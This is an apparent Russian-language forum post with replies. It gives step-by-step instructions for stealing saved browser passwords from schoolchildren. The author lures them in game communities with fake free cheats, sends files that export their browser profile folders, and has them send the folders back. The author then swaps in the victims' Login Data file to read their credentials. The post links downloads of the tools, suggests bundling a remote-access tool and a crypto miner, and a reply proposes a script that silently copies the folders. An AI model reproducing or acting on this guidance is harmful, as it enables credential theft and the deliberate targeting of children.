Итак, сразу говорю, метод не 100%. Понадобится СИ и файлы от флешки-*******а и программа "WebBrowserPassView" Скачиваем файлы флешки-*******а - https://yadi.sk/d/cWWfABPA3NTjJA. Скачиваем программу "WebBrowserPassView" - https://yadi.sk/d/_xk-jtzV3NTjsF. Ищем наивную жертву (школьника), в группах типа "Warface", "Автария", "Кубезумие 3D" и т.д. Пишем жертве (школьнику): "Привет, у меня продаются читы на Warface, но тебе я их дам бесплатно, потому что заказов нет" или что-то типа этого. После того как вы вбили ему эту дичь с вероятностью 81,5% отправляем ему файлы флешки-*******а (по желанию можно ещё и свой RMS вместе с майнером, но возможно у него IQ выше 70 и он поймёт, то что это вирус). После того, как он скачал, говорите то что мол открой файл warfacecheat, все читы установились. Теперь (переименуйте файл 1.bat, мне лень перезаливать) у тебя появятся папки, Google Chrome, Yandex, Opera, Mozilla и Amigo, это те браузеры, на которые можно поставить читы (если другой браузер скажите, мол скорее всего тоже работает, стоит попытаться и чет подобное). Говорите жертве (школьнику), типа кинь эти папки мне, я их закину в прогу и тебе их активирую, сделал так, чтобы читы не пиратили. Теперь идёте в C:/Users/Имя Пользователя/AppData/Local/Google/Chrome/User Data/Default и удаляете файл LoginData (не чистите корзину). Теперь заходим в папку Google, которую скинула жертва (школьник) и вставляем файл LoginData, перед этим закройте браузер, т.к. там хранятся пароли от того же ВК, на котором вы сидите. Всё, все пароли от гуглянцкого этой жертвы (если он неё есть) в ваших руках, что делать с этой информацией, решать вам. P.S. Насколько я помню у Яндекса путь C:/Users/Имя пользователя/AppData/Local/Yandex/YandexBrowser/User Data/Default и Login Data и также со всеми браузерами. P.P.S. Вот еще лайфхак. Если куртка не расстегивается и ни за что не зацепилась, тяните посильнее.
Проще уж скрипт написать, который залезет по этому пути И скачает все файлы оттуда. Закинет на флешку и спрячет от глаз жертвы.
Ну дело в том, что она, когда я лично её запускал, ничего не находила. А про то что я выше написал, я лично пользуюсь когда переустанавливаю винду, чисто скидываю папку себе, получаю всю историю, все кукисы, все данные. Так что, если заполучить папку жертвы, можно получить куда более чем этой софтиной.